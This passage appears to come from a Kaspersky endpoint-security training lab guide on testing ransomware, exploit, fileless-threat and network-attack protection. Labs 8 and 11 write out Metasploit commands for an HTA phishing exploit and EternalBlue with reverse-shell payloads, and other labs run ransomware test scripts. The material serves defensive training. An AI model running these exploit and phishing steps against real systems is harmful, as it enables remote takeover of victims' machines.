21. Make sure that the invoice.txt.aes file is encrypted 22. Close Notepad 23. Refresh the contents of the folder \\tom- laptop\temp 24. Make sure that the invoice.txt file has been recreated Sometimes, the original file is not deleted because Behavior Detection blocks the remote connection as soon as detects remote encryption, before the script deletes the original file. 25. Try to delete the encrypted file 26. Make sure that access is denied file://///tom-laptop/temp file://///tom-laptop/temp file://///tom-laptop/temp L–48 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task B: Check how the Behavior Detection component reacted on the Tom- Laptop machine Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that the protection component performed. The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 27. Log on to the abc\Tom account, password Ka5per5Ky 28. Open Kaspersky Endpoint Security interface 29. Open the application reports 30. Select Behavior Detection 31. Make sure that the malicious encryption activity attempted from IP 10.28.0.100 was blocked 32. Make sure that the C:\temp\invoice.txt file was restored L–49 Lab 7. How to test protection of network folders against ransomware Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices In some cases, Behavior Detection may consider operations performed by design engineering applications as crypto- ransomware activities. To prevent false positives, we recommend that you add computers to trusted. Select the Administration Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-Desktop computer to the list of exclusions of the Behavior Detection component. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 33. Open Kaspersky Security Center Web Console 34. Go to Devices | Policies & Profiles 35. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 36. Switch to the Application Settings tab 37. In Advanced Threat Protection, select Behavior Detection 38. Reconfigure protection of shared folders against external encryption: Switch the action from Block connection to Inform 39. To create an exclusion, click Add L–50 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 40. Create an exclusion. Type the IP address of the Alex-Desktop workstation (10.28.0.100) 41. Click OK twice 42. Save the changes to the policy Task D: Make sure that exclusions for trusted network devices work correctly The task is performed on Alex-Desktop. The DC, Security-Center, and Tom-Laptop machines must be powered on. 43. On the Alex-Desktop machine, log off and on again 44. Open the folder \\tom-laptop\temp\ 45. Delete the file invoice.txt.aes 46. Find the ransomware2.bat file on the desktop 47. Run the ransomware2.bat file 48. Make sure that the invoice.txt file has been encrypted and the original invoice.txt file has not been restored 49. Delete the file invoice.txt.aes 50. Make sure that the file has been deleted correctly Conclusion In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with the default settings. The Behavior Detection component takes care of that. If necessary, the administrator can always specify exclusions for the protection component and allow specific network devices to encrypt files in shared folders. file://///tom-laptop/temp L–51 Lab 8. How to check health of Exploit Prevention Lab 8. How to check health of Exploit Prevention Scenario. Criminals can exploit vulnerabilities much easier than one would imagine. With such a powerful tool as Metasploit Framework, a criminal can create an exploit and send it to unsuspecting company employees. Contents. In this lab, we will: 1. Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer 2. Enable protection against exploits Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer On the Kali computer, run the Metasploit Framework penetration utility. Attack HTA (HTML Application) via PowerShell. The task is performed on Tom-Laptop. The DC, Security-Center, Alex-Desktop, and Kali machines must be powered on. 1. Exit Kaspersky Endpoint Security: Right-click its icon in the notification area and on the shortcut menu, select Exit Switch to the Kali computer. 2. Log on to the root account. Password—Ka5per5Ky 3. Open a Terminal window 4. Start the Metasploit Framework console. Carry out the following command: msfconsole 5. Select the exploit template. Carry out the following command: use exploit/windows/misc/hta_server You can use the TAB key to autocomplete commands 6. Display the list of applications vulnerable to this exploit. Carry out the following command: show targets L–52 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 7. Select to attack PowerShell x64. Carry out the following command: set target 1 8. Specify the malicious payload. Carry out set PAYLOAD windows/x64/meterpreter/reverse_tcp 9. Specify the address of the listening server (address of the Kali computer). Carry out the following command: set LHOST 10.28.0.50 10. Activate the exploit. Carry out exploit -j 11. Copy the link (right-click, Copy Link) http://10.28.0.50:8080/<name of the generated file>.hta from the Terminal to the clipboard 12. Open a new terminal instance 13. Start Mozilla Thunderbird. In the terminal, type thunderbird 14. Create a new message: — Specify the addressee. In the To: box, type Tom@abc.lab — In the Subject: box, type Report — Paste the link from the clipboard (http://10.28.0.50/<name of the generated file>.hta) to the message body 15. Click Send to dispatch the message http://10.28.0.50:8080/%3Cname%20of%20the%20generated%20file%3E.hta L–53 Lab 8. How to check health of Exploit Prevention Switch to Tom-Laptop. 16. Open Microsoft Outlook 17. Select the received message 18. Open the link from the message in a browser 19. Save the file to the computer 20. In the warning window, click Run Switch to the Kali computer. 21. Open the Metasploit Framework console. 22. Make sure that a new session has been opened 23. Connect to the created session. Carry out the following command: sessions 1 where 1 is the number of the recently created session 24. You have got full remote access to the Tom-Laptop machine 25. Run Command Prompt. Carry out the following command: shell Then you can carry out the whoami command to get the name of the active user whoami L–54 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task B: Disable most of the protection components In this task, you will disable most of the Kaspersky Endpoint Security protection components. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 26. Open Kaspersky Security Center Web Console 27. Go to Devices | Policies & Profiles 28. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 29. Switch to the Application Settings tab 30. Disable the following protection components: – KSN – Behavior Detection 31. Switch to Essential Threat Protection 32. Disable the following protection components: – File Threat Protection – Web Threat Protection – Mail Threat Protection 33. Click Save to save the policy settings. Confirm that you want to use the specified settings: Click Yes 34. Wait for the policy to be applied L–55 Lab 8. How to check health of Exploit Prevention Task C: Test protection against exploits In this task, you will enable the Exploit Prevention component and test it. The task is performed on Tom-Laptop. The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on. 35. Close the web browser window 36. !Restart the Tom-Laptop computer 37. Log on to the system 38. Open the main window of Kaspersky Endpoint Security 39. Click in the Protection components area 40. Make sure that the Exploit Prevention component is enabled 41. Go to the Downloads directory 42. Run the *.hta file 43. Note that a script run error has occurred 44. In the Script Error window, click No L–56 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 45. Open Kaspersky Endpoint Security reports 46. Switch to the report of the Exploit Prevention component 47. Make sure that the exploit was detected Switch to the Kali computer. 48. Log on to the root account. Password—Ka5per5Ky 49. Open the Metasploit console 50. Carry out the following command: sessions 51. Note that there are no active sessions on the criminal’s computer Conclusion In this lab, we made sure that the multitier defense system of Kaspersky Endpoint Security permits repelling advanced threats even when the main protection components are disabled. Lab 9. How to test protection against fileless threats Scenario. Recently, a new threat vector has become popular, which uses PowerShell, a powerful operating system administration and management tool. Criminals can run their code in the address space of the PowerShell process. A fileless attack is hard to detect since malicious code is executed in the memory, unlike an ordinary virus that stores its files on the local drive. Typically, attacks via PowerShell are performed after the machine has been compromised using other malicious actions, usually, exploitation of software vulnerabilities. Contents. In this lab, we will disable KSN and test how antimalware scan interface (AMSI) detects fileless threats. L–57 Lab 9. How to test protection against fileless threats Make sure that AMSI detects fileless threats The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 1. Open c:\temp 2. Unpack the bsstest_amsi archive 3. Enter the password infected 4. Press WIN+R 5. Type powershell 6. Click OK 7. Go to the directory of the unpacked script. Carry out cd c:\temp\bsstest_amsi\bsstest_amsi 8. Run the test PowerShell script. Carry out the following command: .\bsstest_amsi.ps1 9. Make sure that Kaspersky Endpoint Security blocks the script L–58 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 10. Open Kaspersky Endpoint Security reports 11. Select AMSI Protection Provider 12. Make sure that Kaspersky Endpoint Security has detected and neutralized the threat Conclusion You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security can efficiently interact with the script interpreters built into Microsoft Windows operating systems to detect and block malicious code. Lab 10. Improve workstations’ protection against ransomware Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much money. To decrease the risk, configure Host Intrusion Prevention to prohibit all programs except for trusted from editing documents on the computers. Contents. In this lab, we will: 1. Simulate a ransomware infection 2. Prohibit all programs except for trusted from editing and deleting documents 3. Configure Host Intrusion Prevention events to be stored on the Administration Server 4. Simulate encrypting a document and check the result Task A: Simulate a ransomware infection Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to encrypt text documents and delete the original files. L–59 Lab 10. Improve workstations’ protection against ransomware The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 1. Find the ransomware.bat and invoice.txt files on the desktop 2. Run the ransomware.bat file 3. Make sure that the invoice.txt file has gone, and the invoice.txt.aes file has appeared instead 4. Open the invoice.txt.aes file in Notepad 5. Make sure that the invoice.txt.aes file is encrypted 6. Close Notepad Task B: Prohibit all programs except for trusted from editing and deleting documents Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of protected resources. Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs except for trusted from editing, deleting, and creating files of this category. The task is performed on Security-Center. The DC, Tom-Laptop, and Alex-Desktop machines must be powered on. 7. Open Kaspersky Security Center Web Console 8. Go to Devices | Policies & Profiles 9. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 10. Switch to the Application settings tab 11. In Advanced Threat Protection, select Host Intrusion Prevention L–60 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 12. Enable Host Intrusion Prevention 13. To open the list of rights, click the link Application rights and protected resources 14. To create a new category, in the left pane, click Add 15. Select Category of protected resources 16. Type Protected Files for the category name 17. Click the Operating system link 18. Select the Personal data subcategory 19. Click OK twice L–61 Lab 10. Improve workstations’ protection against ransomware 20. To create a subcategory, in the left pane, click Add 21. Select Category of protected resources 22. Specify Documents for the name 23. Click the Operating system link 24. Specify the Protected Files subcategory 25. Click OK twice 26. Add file types to the category. In the left pane, click Add L–62 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 27. For the resource type, select File or folder 28. In the Path box, enter *.txt, and in the Display name field, type txt 29. Click the Operating system link 30. Specify the Documents subcategory 31. Click OK twice 32. Specify rights for the created category: Select the category Personal data | Protected files | Documents | *.txt 33. Click the *.txt row 34. Prohibit applications that have Low and High Restricted reputation from editing the files belonging to this category: Change the action for Write, Delete, and Create operations to Block 35. Configure Host Intrusion Prevention to log attempts to edit documents. Enable Log events for the Write, Delete, and Create actions 36. Click OK twice to save the access rights 37. Click Save to save the policy 38. Wait for the policy to be enforced L–63 Lab 10. Improve workstations’ protection against ransomware Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in restricted group and Application privilege control rule triggered. Configure the policy to store these events on the Administration Server. The task is performed on Security-Center. The DC, Tom-Laptop, and Alex-Desktop machines must be powered on. 39. Open Kaspersky Security Center MMC Console 40. Open the Kaspersky Endpoint Security for Windows policy 41. Switch to the Event configuration section and open the Info tab 42. Click the Event type header to sort the list alphabetically and select the event Application placed in restricted group 43. Open the event’s properties: Click the Properties button below the list L–64 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 44. Configure storing the event in the Administration Server database: Select On Administration Server for (days) and click OK 45. Select the event Host Intrusion Prevention was triggered and click Properties 46. Configure storing the event in the Administration Server database: Select On Administration Server for (days) and click OK 47. Click Save to save the policy 48. Wait for the policy to be enforced L–65 Lab 10. Improve workstations’ protection against ransomware 49. Open the web console 50. Switch to the Monitoring & Reporting | Event Selections tab 51. To create a new event selection, click Add 52. Type Host Intrusion Prevention events for the selection name 53. Switch to the Events section 54. In the Application name list, select Kaspersky Endpoint Security 55. Select the Severity Level Info 56. Select the Include general events check box 57. On the list of events, select — Application placed in restricted group — Host Intrusion Prevention was triggered 58. Click Save L–66 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task D: Simulate encrypting a document and check the result Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt text documents and delete the original files. Make sure that the script cannot delete the text file this time. Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host Intrusion Prevention that did not allow the script to delete the text document. The task is performed on Alex-Desktop. The DC, Tom-Laptop, and Security-Center machines must be powered on. 59. Find the ransomware.bat and invoice.txt files on the desktop 60. Run the ransomware.bat file 61. Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been deleted 62. Switch to the Security- Center computer 63. Open Kaspersky Security Center Web Console 64. Switch to the Monitoring & Reporting | Event Selections tab 65. Tick the Host intrusion prevention events selection 66. Click Start to display the event selection 67. Study the events in the selection. Make sure that it was Host Intrusion Prevention that did not allow the program to delete the document Conclusion You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. To properly protect against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc. Programs by known vendors, such as Microsoft Office, are trusted, and Host Intrusion Prevention will not restrict them. Ransomware, even new that has not yet been added to the signature database or KSN, will never get in the trusted category and will not be able to edit documents. L–67 Lab 11. How to test Network Threat Protection Lab 11. How to test Network Threat Protection Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. You scan your network periodically with a special security scanner to find out whether the computers are properly shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any connections from the attacking computer for an hour. Add the computer from which you perform vulnerability scanning to the list of exclusions. Contents. In this lab, we will: 1. Imitate a network attack from Kali on Alex-Desktop 2. Study the Network attack report 3. Unblock the Kali computer 4. Configure the Network Threat Protection not to block Kali 5. Imitate an attack from Kali on Alex-Desktop and study the results Task A: Imitate a network attack from Kali on Alex-Desktop On the Kali computer, run the Metasploit Framework penetration utility. Perform an Eternalblue attack. EternalBlue exploits a vulnerability in Server Message Block (SMB) v1 protocol. A criminal can generate a specially prepared package, transfer it to a remote computer, thus get remote access to the system, and run any code there. The task is performed on Kali. The DC, Security-Center, and Alex-Desktop machines must be powered on. 1. Log on to the root account. Password—Ka5per5Ky 2. Run the terminal 3. Start the Metasploit Framework console. Carry out the following command: msfconsole 4. Select the exploit template. Carry out the following command: use exploit/windows/smb/ms17_010_eternalblue 5. Specify the malicious payload. Carry out set payload generic/shell_reverse_tcp 6. Specify the address of the listening server (address of the Kali computer). Carry out the following command: set LHOST 10.28.0.50 L–68 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 7. Specify the address of the victim machine. Carry out the following command: set RHOST 10.28.0.100 8. Activate the exploit. Carry out exploit Note that you cannot exploit the vulnerability The attack fails because Kaspersky Endpoint Security blocks network attacks by default. Task B: Study the Network attack report Find the list of reports in the Administration Console. Create a new template for the Network attack report. Generate the report, consult the details of the network attack, find the addresses of the attacking and attacked machines. The task is performed on Security-Center. The DC, Tom-Laptop, and Alex-Desktop machines must be powered on. 9. Open Kaspersky Security Center Web Console 10. Switch to the Monitoring & Reporting | Reports tab 11. Click Add 12. Name the report Network attack report 13. Under Statistics of threats, select Report on network attacks 14. Click Next L–69 Lab 11. How to test Network Threat Protection 15. Click Next 16. Select to include information over the last 30 days 17. Click OK 18. In the message box, click Save and run 19. Switch to the Details tab L–70 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 20. Find the IP address of the attacking computer and DNS name of the attacked machine in the report 21. Close the report 22. Switch to the Event Selections tab 23. Click Add to create a new event selection 24. Name the selection Network attacks 25. Switch to the Events section 26. In the Application name field, select Kaspersky Endpoint Security for Windows 27. For the Severity level, choose Critical 28. Select the check box Include general events L–71 Lab 11. How to test Network Threat Protection 29. On the list of events, find and select the Network Attack detected event 30. Click Save to save the event selection 31. In the message box, tick Go to selection result and click Save 32. Study the events in the selection Task C: Unblock the Kali computer Open Kaspersky Endpoint Security on the attacked computer. Use the shortcut menu of the Firewall component to open Network Monitor. Find the list of blocked computers and unblock the Kali computer. L–72 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Alex-Desktop. The DC, Security-Center, Tom-Laptop, and Kali machines must be powered on. 33. Open Kaspersky Endpoint Security interface: Click its icon in the notification area 34. Click in the Protection components area 35. At the bottom of the window, click Network Monitor 36. The Network Monitor window will open L–73 Lab 11. How to test Network Threat Protection 37. Switch to the Blocked computers tab 38. Unblock the Kali computer: Select address 10.28.0.50 and click Unblock 39. Close all Kaspersky Endpoint Security windows Task D: Configure exclusions in the properties of Network Threat Protection In the Kaspersky Endpoint Security policy, open the Network Attack Blocker settings. Find the list of trusted computers and add the IP address of the Kali computer (10.28.0.50) to it. The task is performed on Security-Center. The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on. 40. Open Kaspersky Security Center Web Console 41. Go to Devices | Policies & Profiles 42. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 43. Switch to the Application Settings tab 44. Open the Essential Threat Protection section 45. Click the link Network Threat Protection 46. Open the list of trusted computers: Click the link Exclusions L–74 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 47. Click Add to specify a device 48. Type the IP address of the Kali computer, 10.28.0.50, and click OK 49. Click OK 50. Click Save to save the policy 51. Wait for the policy to be enforced Task E: Imitate an attack from Kali on Alex-Desktop and study the results Simulate another attack on the computer Alex-Desktop from Kali using Metasploit Framework. Make sure that Kaspersky Endpoint Security does not react to this attack anymore. The task is performed on Kali. The DC, Security-Center, Alex-Desktop, and Tom-Laptop machines must be powered on. 52. Log on to the root account. Password—Ka5per5Ky 53. Open a Terminal window 54. Activate the exploit again. Carry out the following command: exploit 55. Make sure that you have exploited the vulnerability in SMB protocol L–75 Lab 12. How to configure exclusions from self-defense 56. Display the list of directories. Carry out the following command: dir Conclusion You have configured Network Threat Protection not to react to attacks from the specified IP address. You can use this method to exclude addresses of network security scanners. Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky Security Center. If the pre-configured reports available on the Reports tab are insufficient, have a look at the complete list of reports that you can create. If none of them yet meets your needs, create a selection of events that interest you. Configure conditions: Event types, time, group of computers, etc. Lab 12. How to configure exclusions from self-defense Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. To remotely help employees, you connect to their machines through Windows Remote Assistance. However, Kaspersky Endpoint Security does not react to your actions via Windows Remote Assistance. Make an exclusion for Windows Remote Assistance to be able to manage Kaspersky Endpoint Security remotely. Contents. In this lab, we will: 1. Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance 2. Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security 3. Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance Run Windows Remote Assistance on Alex-Desktop, remember the ID and password. Run Windows Remote Assistance on Tom-Laptop and connect to Alex-Desktop. Open Kaspersky Endpoint Security interface. Try to open the Reports window. L–76 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Alex-Desktop at first. The DC, Security-Center, and Tom-Laptop machines must be powered on. 1. Run Outlook 2. Press WIN+R 3. Type msra in the field 4. Click OK 5. Select the option Invite someone you trust to help you 6. Select Use e-mail to send an invitation 7. Specify the addressee. In the To: box, type tom@abc.lab 8. Click Send mailto:tom@abc.lab L–77 Lab 12. How to configure exclusions from self-defense 9. Write down the remote connection password Switch to Tom-Laptop 10. Log on to the abc\Tom account. Password— Ka5per5Ky 11. Run Outlook 12. In the Inbox, open the message from Alex@abc.lab 13. Click the attached file Invitation.* 14. Click Open 15. Type the remote connection password (see step 8) Switch to the Alex-Desktop machine. 16. Allow Tom to connect to your workstation. In the window that opens, click Yes mailto:Alex@abc.lab L–78 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Switch to Tom-Laptop 17. Click Request control in the upper-left corner of the window Switch to the Alex-Desktop machine. 18. Allow Tom to manage your workstation. In the window that opens, click Yes Switch to Tom-Laptop 19. Open Kaspersky Endpoint Security interface 20. Make sure that you cannot manage Kaspersky Endpoint Security remotely L–79 Lab 12. How to configure exclusions from self-defense Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security Open the policy of Kaspersky Endpoint Security. Find the list of trusted programs. Add the msra.exe file to the list of trusted applications. Allow it to interact with the Kaspersky Endpoint Security interface. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 21. Open Kaspersky Security Center Web Console 22. Go to Devices | Policies & Profiles 23. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 24. Switch to the Application Settings tab 25. Open the General Settings section 26. Open the list of exclusions: Click the Exclusions link 27. To add a trusted application, click the link Trusted applications in the lower-left corner of the window 28. To specify the service process of Microsoft Remote Assistance, click